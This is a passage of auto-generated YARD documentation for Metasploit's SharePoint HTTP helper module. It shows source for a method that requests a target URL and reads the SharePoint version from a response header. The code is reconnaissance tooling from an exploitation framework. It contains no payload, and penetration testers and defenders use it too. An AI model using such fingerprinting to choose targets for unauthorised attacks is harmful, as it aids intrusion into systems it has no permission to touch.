<span class='id identifier rubyid_res'>res</span><span class='period'>.</span><span class='id identifier rubyid_get_xml_document'>get_xml_document</span><span class='period'>.</span><span class='id identifier rubyid_at'>at</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>//d:Id</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='op'>&amp;.</span><span class='id identifier rubyid_text'>text</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="sharepoint_get_version-instance_method">
#<strong>sharepoint_get_version</strong>(http_request_opts = {}) &#x21d2; <tt><span class='object_link'><a href="../../../../Rex/Version.html" title="Rex::Version (class)">Rex::Version</a></span></tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Get the SharePoint version number.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>http_request_opts</span>
<span class='type'>(<tt>Hash</tt>)</span>
<em class="default">(defaults to: <tt>{}</tt>)</em>
&mdash;
<div class='inline'>
<p>Options to override the defaults of the HTTP request.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt><span class='object_link'><a href="../../../../Rex/Version.html" title="Rex::Version (class)">Rex::Version</a></span></tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The SharePoint version if it was able to be recovered.</p>
</div>
</li>
</ul>
<p class="tag_title">See Also:</p>
<ul class="see">
<li><a href="https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates" target="_parent" title="SharePoint Version Numbers">SharePoint Version Numbers</a></li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
72
73
74
75
76
77
78
79
80
81</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sharepoint.rb', line 72</span>
<span class='kw'>def</span> <span class='id identifier rubyid_sharepoint_get_version'>sharepoint_get_version</span><span class='lparen'>(</span><span class='id identifier rubyid_http_request_opts'>http_request_opts</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='id identifier rubyid_http_request_opts'>http_request_opts</span><span class='period'>.</span><span class='id identifier rubyid_merge'>merge</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_normalize_uri'>normalize_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_target_uri'>target_uri</span><span class='period'>.</span><span class='id identifier rubyid_path'>path</span><span class='rparen'>)</span>
<span class='rbrace'>}</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span> <span class='kw'>unless</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>^(?&lt;build&gt;[\d.]+)</span><span class='regexp_end'>/</span></span> <span class='op'>=~</span> <span class='id identifier rubyid_res'>res</span><span class='op'>&amp;.</span><span class='id identifier rubyid_headers'>headers</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>MicrosoftSharePointTeamServices</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Version.html" title="Rex::Version (class)">Version</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../../../Rex/Version.html#initialize-instance_method" title="Rex::Version#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_build'>build</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:15 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink